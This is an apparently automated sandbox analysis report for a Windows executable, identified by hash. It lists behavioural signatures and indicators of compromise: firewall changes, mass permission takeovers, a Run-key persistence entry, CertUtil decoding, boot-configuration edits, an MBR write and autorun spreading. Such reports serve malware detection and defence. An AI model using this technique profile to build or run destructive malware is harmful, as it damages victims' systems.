690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408

Analysis

max time kernel
8s
max time network
123s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
19-11-2024 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Size

112KB
MD5

81a7a946456f1f6dae4715b1feb72ed0
SHA1

af83b938017efd53f95671adc0c6d2aa1088d38e
SHA256

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408
SHA512

a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692
SSDEEP

3072:O7DhdC6kzWypvaQ0FxyNTBfHdIyEGfvBN+:OBlkZvaF4NTB/yyEGfvBQ

Score

8^/10

bootkit defense_evasion discovery evasion exploit persistence privilege_escalation upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 64 IoCs

Processes:

attrib.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\pcw.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\wimmount.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ws2ifsl.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\fvevol.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mrxsmb20.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mspclock.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\amdppm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mskssrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\UAGP35.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hidusb.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mouclass.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\FWPKCLNT.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rootmdm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sffp_mmc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\amdsbs.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ataport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\drmkaud.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\msdsm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ndis.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\rdbss.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\termdd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\BrSerWdm.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\GAGP30KX.SYS	attrib.exe
File opened for modification	C:\Windows\System32\drivers\kbdclass.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\BrUsbSer.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\TsUsbGD.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\raspptp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\RNDISMP.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sffp_sd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\usbohci.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\drmk.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ksecdd.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\lsi_scsi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sbp2port.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\usbuhci.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\acpi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\irda.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\mpsdrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\modem.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pacer.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dmvsc.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dxgkrnl.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\irenum.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\hidir.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\raspppoe.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\vmbus.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\amdsata.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\lsi_sas.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\udfs.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\appid.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ipfltdrv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\netio.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\Wdf01000.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\winhv.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\dxg.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\gmreadme.txt	attrib.exe
File opened for modification	C:\Windows\System32\drivers\RDPCDD.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\null.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\nwifi.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\parport.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\pcmcia.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\sisraid2.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\iirsp.sys	attrib.exe
File opened for modification	C:\Windows\System32\drivers\ks.sys	attrib.exe

Modifies Windows Firewall 2 TTPs 13 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
4292	netsh.exe
4432	netsh.exe
13804	netsh.exe
13448	netsh.exe
13492	netsh.exe
14216
1084	netsh.exe
4324	netsh.exe
7044	netsh.exe
3728	netsh.exe
12396	netsh.exe
13360
10988

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exe

pid	Process
13200	takeown.exe
11156	icacls.exe
11512
4588	icacls.exe
4296	takeown.exe
5172	icacls.exe
11012	icacls.exe
10552	takeown.exe
12816	icacls.exe
13664	icacls.exe
10004
2536	icacls.exe
6168	takeown.exe
11932	takeown.exe
6568
6820	icacls.exe
9108	icacls.exe
10920	takeown.exe
12012	takeown.exe
848	takeown.exe
880	icacls.exe
4132	takeown.exe
4904	icacls.exe
14680
10988
5308	icacls.exe
5656	icacls.exe
12332	takeown.exe
14224
4608	icacls.exe
300	takeown.exe
3852	takeown.exe
4868	icacls.exe
15176
3508	takeown.exe
12796	takeown.exe
15296
2084	takeown.exe
14408
14264
8584
2508	takeown.exe
5476	takeown.exe
11212	takeown.exe
12804	icacls.exe
4688
9532	takeown.exe
2108	icacls.exe
12212
2356	takeown.exe
4320	takeown.exe
4292	icacls.exe
6768	takeown.exe
7140	icacls.exe
7500
14936
3856	icacls.exe
6836	takeown.exe
6968	icacls.exe
14864
6804	icacls.exe
9560	icacls.exe
11856	takeown.exe
3092	takeown.exe

Drops startup file 5 IoCs

Processes:

cmd.execmd.execmd.execmd.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe

Executes dropped EXE 14 IoCs

Processes:

Tasksvc.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

pid	Process
1888	Tasksvc.exe
2752	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
1072	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
2544	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
2188	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
1964	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
2228	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3056	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
1232	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3080	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3452	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3612	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3680	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
4464	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exe

pid	Process
300	takeown.exe
4660	takeown.exe
4064	icacls.exe
10052
11592	takeown.exe
2064	icacls.exe
10080
4324	takeown.exe
4260	icacls.exe
7032	takeown.exe
6168	takeown.exe
13584	icacls.exe
13644
2500	takeown.exe
1624	icacls.exe
4320	takeown.exe
11956	takeown.exe
12904	icacls.exe
13664	icacls.exe
12212
12332	takeown.exe
11920
14368
4200	takeown.exe
5232	icacls.exe
9532	takeown.exe
11932	takeown.exe
14864
2296	icacls.exe
5020	icacls.exe
6416	icacls.exe
6808	icacls.exe
13200	takeown.exe
13356	takeown.exe
13656	icacls.exe
4268	takeown.exe
4268	takeown.exe
4676	icacls.exe
2848	takeown.exe
2892	icacls.exe
4132	takeown.exe
1332	takeown.exe
15320
10004
10856	icacls.exe
10552	takeown.exe
14680
15260
4376	takeown.exe
4312	takeown.exe
11528	icacls.exe
11864	takeown.exe
11416	icacls.exe
11176	takeown.exe
4064	icacls.exe
4944	takeown.exe
6872	takeown.exe
9548	takeown.exe
12816	icacls.exe
13440	takeown.exe
13688	icacls.exe
13884	takeown.exe
2508	takeown.exe
6160	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\EthernetKill = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EthernetKiller.cmd"	reg.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

Processes:

certutil.exe

pid	Process
1816	certutil.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies boot configuration data using bcdedit 12 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	Process
760	bcdedit.exe
4708	bcdedit.exe
4820	bcdedit.exe
4660	bcdedit.exe
9760
9304
14324
14228
13568
7468
14872
15108

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

Processes:

Tasksvc.exe

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Tasksvc.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

cmd.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 3 IoCs

Processes:

attrib.exeattrib.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\winresume.exe	attrib.exe
File opened for modification	C:\Windows\System32\winload.exe	attrib.exe
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x0007000000017520-261.dat	upx
behavioral1/memory/1888-265-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral1/memory/1888-415-0x0000000000400000-0x000000000040E000-memory.dmp	upx

Drops file in Windows directory 12 IoCs

Processes:

mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exe

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exeTasksvc.exe690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tasksvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

Gathers network information 2 TTPs 17 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	Process
7024	ipconfig.exe
13252	ipconfig.exe
10640	ipconfig.exe
748	ipconfig.exe
6152	ipconfig.exe
6228	ipconfig.exe
5624	ipconfig.exe
6772	ipconfig.exe
14492
6900	ipconfig.exe
3056	ipconfig.exe
6984	ipconfig.exe
7104	ipconfig.exe
692	ipconfig.exe
5644	ipconfig.exe
13156	ipconfig.exe
1980	ipconfig.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	Process
4196	reg.exe
8288	reg.exe
11948	reg.exe
2444	reg.exe
13628	reg.exe
8528	reg.exe
11900	reg.exe
2056	reg.exe
11948	reg.exe
3800	reg.exe
4068	reg.exe
10660	reg.exe
11152	reg.exe
6584	reg.exe
12512	reg.exe
13724	reg.exe
10564
3144	reg.exe
4256	reg.exe
11224	reg.exe
12432	reg.exe
13072	reg.exe
13824
13952
7296
1848	reg.exe
3728	reg.exe
3732	reg.exe
10648	reg.exe
9028	reg.exe
3688	reg.exe
7992	reg.exe
3772	reg.exe
4212	reg.exe
8716	reg.exe
9912	reg.exe
10552	reg.exe
11124
808	reg.exe
8040	reg.exe
11508	reg.exe
5872	reg.exe
13336	reg.exe
2108	reg.exe
12688	reg.exe
14780
300	reg.exe
2016	reg.exe
10888	reg.exe
11872	reg.exe
11412	reg.exe
3256	reg.exe
4304	reg.exe
1868	reg.exe
11204	reg.exe
340
14376
12864	reg.exe
12432	reg.exe
6416
808	reg.exe
8968	reg.exe
10644	reg.exe
11932	reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 14 IoCs

Processes:

pid	Process
1888	Tasksvc.exe
2752	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
1072	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
2544	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
2188	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
1964	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
2228	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3056	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
1232	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3080	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3452	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3612	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
3680	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
4464	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	Process
Token: SeTakeOwnershipPrivilege	2848	takeown.exe
Token: SeTakeOwnershipPrivilege	2640	takeown.exe
Token: SeTakeOwnershipPrivilege	1220	takeown.exe
Token: SeTakeOwnershipPrivilege	2500	takeown.exe
Token: SeTakeOwnershipPrivilege	2084	takeown.exe
Token: SeTakeOwnershipPrivilege	1332	takeown.exe
Token: SeTakeOwnershipPrivilege	1716	takeown.exe
Token: SeTakeOwnershipPrivilege	2508	takeown.exe
Token: SeTakeOwnershipPrivilege	300	takeown.exe
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeTakeOwnershipPrivilege	2920	takeown.exe
Token: SeTakeOwnershipPrivilege	2116	takeown.exe
Token: SeTakeOwnershipPrivilege	2488	takeown.exe
Token: SeTakeOwnershipPrivilege	848	takeown.exe
Token: SeTakeOwnershipPrivilege	2148	takeown.exe
Token: SeTakeOwnershipPrivilege	2396	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe

Suspicious use of SetWindowsHookEx 33 IoCs

Processes:

mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exe

pid	Process
2808	mspaint.exe
2896	mspaint.exe
3008	mspaint.exe
2808	mspaint.exe
2896	mspaint.exe
3008	mspaint.exe
2896	mspaint.exe
3008	mspaint.exe
2808	mspaint.exe
2896	mspaint.exe
3008	mspaint.exe
2808	mspaint.exe
2016	mspaint.exe
2300	mspaint.exe
1744	mspaint.exe
1456	mspaint.exe
1948	mspaint.exe
3132	mspaint.exe
2016	mspaint.exe
2300	mspaint.exe
3580	mspaint.exe
3672	mspaint.exe
1744	mspaint.exe
3780	mspaint.exe
1456	mspaint.exe
1948	mspaint.exe
3132	mspaint.exe
3580	mspaint.exe
3672	mspaint.exe
3780	mspaint.exe
2016	mspaint.exe
2016	mspaint.exe
2300	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.execmd.execmd.exe

description	pid	Process	procid_target
PID 2200 wrote to memory of 2612	2200	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	31
PID 2200 wrote to memory of 2612	2200	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	31
PID 2200 wrote to memory of 2612	2200	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	31
PID 2200 wrote to memory of 2612	2200	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	31
PID 2612 wrote to memory of 2816	2612	cmd.exe	32
PID 2612 wrote to memory of 2816	2612	cmd.exe	32
PID 2612 wrote to memory of 2816	2612	cmd.exe	32
PID 2612 wrote to memory of 2848	2612	cmd.exe	34
PID 2612 wrote to memory of 2848	2612	cmd.exe	34
PID 2612 wrote to memory of 2848	2612	cmd.exe	34
PID 2612 wrote to memory of 2892	2612	cmd.exe	35
PID 2612 wrote to memory of 2892	2612	cmd.exe	35
PID 2612 wrote to memory of 2892	2612	cmd.exe	35
PID 2816 wrote to memory of 2640	2816	cmd.exe	36
PID 2816 wrote to memory of 2640	2816	cmd.exe	36
PID 2816 wrote to memory of 2640	2816	cmd.exe	36
PID 2612 wrote to memory of 2784	2612	cmd.exe	37
PID 2612 wrote to memory of 2784	2612	cmd.exe	37
PID 2612 wrote to memory of 2784	2612	cmd.exe	37
PID 2612 wrote to memory of 1220	2612	cmd.exe	38
PID 2612 wrote to memory of 1220	2612	cmd.exe	38
PID 2612 wrote to memory of 1220	2612	cmd.exe	38
PID 2612 wrote to memory of 2616	2612	cmd.exe	39
PID 2612 wrote to memory of 2616	2612	cmd.exe	39
PID 2612 wrote to memory of 2616	2612	cmd.exe	39
PID 2612 wrote to memory of 2504	2612	cmd.exe	40
PID 2612 wrote to memory of 2504	2612	cmd.exe	40
PID 2612 wrote to memory of 2504	2612	cmd.exe	40
PID 2612 wrote to memory of 2500	2612	cmd.exe	41
PID 2612 wrote to memory of 2500	2612	cmd.exe	41
PID 2612 wrote to memory of 2500	2612	cmd.exe	41
PID 2612 wrote to memory of 2536	2612	cmd.exe	42
PID 2612 wrote to memory of 2536	2612	cmd.exe	42
PID 2612 wrote to memory of 2536	2612	cmd.exe	42
PID 2612 wrote to memory of 2568	2612	cmd.exe	43
PID 2612 wrote to memory of 2568	2612	cmd.exe	43
PID 2612 wrote to memory of 2568	2612	cmd.exe	43
PID 2612 wrote to memory of 1816	2612	cmd.exe	44
PID 2612 wrote to memory of 1816	2612	cmd.exe	44
PID 2612 wrote to memory of 1816	2612	cmd.exe	44
PID 2612 wrote to memory of 1888	2612	cmd.exe	45
PID 2612 wrote to memory of 1888	2612	cmd.exe	45
PID 2612 wrote to memory of 1888	2612	cmd.exe	45
PID 2612 wrote to memory of 1888	2612	cmd.exe	45
PID 2612 wrote to memory of 1608	2612	cmd.exe	46
PID 2612 wrote to memory of 1608	2612	cmd.exe	46
PID 2612 wrote to memory of 1608	2612	cmd.exe	46
PID 2612 wrote to memory of 1736	2612	cmd.exe	47
PID 2612 wrote to memory of 1736	2612	cmd.exe	47
PID 2612 wrote to memory of 1736	2612	cmd.exe	47
PID 2612 wrote to memory of 2384	2612	cmd.exe	49
PID 2612 wrote to memory of 2384	2612	cmd.exe	49
